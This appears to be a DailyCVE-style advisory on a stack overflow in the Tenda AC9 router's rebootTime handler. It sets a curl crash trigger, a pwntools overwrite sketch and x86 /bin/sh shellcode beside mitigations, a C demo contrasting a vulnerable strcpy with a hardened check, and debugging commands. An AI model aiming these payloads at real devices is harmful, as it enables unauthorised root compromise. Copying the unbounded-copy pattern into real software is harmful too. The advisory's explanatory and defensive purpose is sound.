How CVE-2025-45428 Works
The vulnerability exists in the `rebootTime` parameter of the `/goform/SetSysAutoRebbotCfg` endpoint in Tenda AC9 firmware v1.0 (V15.03.05.14_multi). Because the handler performs no bounds check before copying the user-supplied value into a fixed-size stack buffer, an attacker can send an excessively long string in the `rebootTime` field and trigger a stack-based buffer overflow. The overflow corrupts the stack frame (saved registers and return address) and, since the web server runs as root on the device, can be leveraged for arbitrary code execution with root privileges. Remote exploitation is possible via unauthenticated HTTP requests.
DailyCVE Form
Platform: Tenda AC9
Version: V15.03.05.14_multi
Vulnerability: Stack Overflow
Severity: Critical
Date: 04/23/2025
What Undercode Say:
Exploitation Analysis
1. Crash Trigger:
curl -X POST "http://<TARGET_IP>/goform/SetSysAutoRebbotCfg" -d "rebootTime=$(python3 -c 'print("A"*500)')"   # 500-byte value; a crash or hang of httpd indicates the overflow
2. ROP Chain Setup:
from pwn import *
payload = b"A" * 264 + p32(0xdeadbeef)   # example overwrite of the saved return address; the 264-byte offset is illustrative and must be measured on the target binary (32-bit little-endian packing)
3. Shellcode Injection:
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"   # x86 Linux execve("/bin//sh"), shown for illustration only; the router's SoC is not x86, so a payload for the target architecture (check with `file httpd`) is required
Protection Measures
1. Firmware Update:
wget https://www.tenda.com.cn/download/firmware/AC9_V15.03.05.15_multi.bin
2. Input Sanitization:
if (rebootTime == NULL || strlen(rebootTime) >= 64) { return -1; }   /* 64 = destination buffer size; reject the request instead of calling exit(), so one bad request cannot take down httpd */
3. Network Mitigation:
iptables -A INPUT -i <WAN_IF> -p tcp --dport 80 -j DROP   # block the web UI on the WAN interface only (<WAN_IF> is a placeholder); management from the LAN stays reachable
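The following C program is an added example, not Tenda's firmware code, illustrating both the unbounded copy described in the "How it works" section and the length check from the Input Sanitization item. It assumes a 64-byte destination buffer (the advisory does not state the real size), uses a minimal stand-in form parser (`form_get`, no percent-decoding), and uses a constructed request body with the 500-byte value from the crash trigger above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed stack buffer; the real size is not given by the advisory. */
#define REBOOT_TIME_MAX 64

/* Minimal application/x-www-form-urlencoded lookup (stand-in for the firmware's own
   parser; percent-decoding is omitted). Returns a malloc'd copy of the value or NULL. */
static char *form_get(const char *body, const char *key) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            size_t vlen = plen - klen - 1;
            char *v = malloc(vlen + 1);
            if (!v) return NULL;
            memcpy(v, p + klen + 1, vlen);
            v[vlen] = '\0';
            return v;
        }
        p = end ? end + 1 : NULL;
    }
    return NULL;
}

/* The defect the advisory describes: the value is copied into a fixed-size stack
   buffer with no length check. More than REBOOT_TIME_MAX-1 bytes overwrite whatever
   sits above the buffer (saved registers, return address). Shown only to expose the
   bug; never call it with untrusted input. */
int set_reboot_cfg_vulnerable(const char *body) {
    char reboot_time[REBOOT_TIME_MAX];
    char *v = form_get(body, "rebootTime");
    if (!v) return -1;
    strcpy(reboot_time, v);            /* unbounded copy: the bug */
    free(v);
    return (int)strlen(reboot_time);   /* placeholder for "apply the setting" */
}

/* How many bytes the vulnerable copy would write past the end of the buffer
   for a given request body (0 means the body does not overflow it). */
int reboot_time_overflow_bytes(const char *body) {
    char *v = form_get(body, "rebootTime");
    if (!v) return 0;
    size_t need = strlen(v) + 1;       /* strcpy also writes the terminating NUL */
    free(v);
    return need > REBOOT_TIME_MAX ? (int)(need - REBOOT_TIME_MAX) : 0;
}

/* Hardened handler: check the length before the copy and reject oversize input
   with an error code rather than aborting the daemon. Returns 0 on success,
   -1 if the parameter is missing, -2 if it is too long for the buffer. */
int set_reboot_cfg_hardened(const char *body, char *out, size_t outsz) {
    char *v = form_get(body, "rebootTime");
    if (!v) return -1;
    size_t n = strlen(v);
    if (n >= REBOOT_TIME_MAX || n >= outsz) {
        free(v);
        return -2;                     /* reject; the buffer is never touched */
    }
    memcpy(out, v, n + 1);
    free(v);
    return 0;
}

int main(void) {
    char buf[REBOOT_TIME_MAX];
    /* Constructed bodies: a sane value and the 500-byte 'A' string from the crash trigger. */
    char attack[600] = "rebootTime=";
    memset(attack + 11, 'A', 500);
    attack[511] = '\0';
    int rc = set_reboot_cfg_hardened("rebootTime=03:00&enable=1", buf, sizeof buf);
    printf("benign: rc=%d value=%s\n", rc, buf);
    printf("attack: rc=%d, vulnerable copy would spill %d bytes past the buffer\n",
           set_reboot_cfg_hardened(attack, buf, sizeof buf),
           reboot_time_overflow_bytes(attack));
    return 0;
}
```

The hardened version returns an error code to the caller so the request can be answered with an HTTP error; an `exit()` in the handler would turn every oversize request into a denial of service against the whole web server.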
Debugging Commands
1. GDB Analysis:
gdb-multiarch -q ./httpd --ex "set follow-fork-mode child" --ex "b 0x08048A12"   # the breakpoint address is illustrative; take the real handler address from a disassembly of the target's httpd
2. Memory Dump:
dd if=/proc/$(pidof httpd)/mem bs=1 skip=$((0x08048000)) count=4096 2>/dev/null | xxd   # read the process's own virtual memory (/dev/mem is physical memory and does not map a user-space address); the offset is illustrative
3. Exploit Check:
checksec --file=/usr/bin/httpd
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode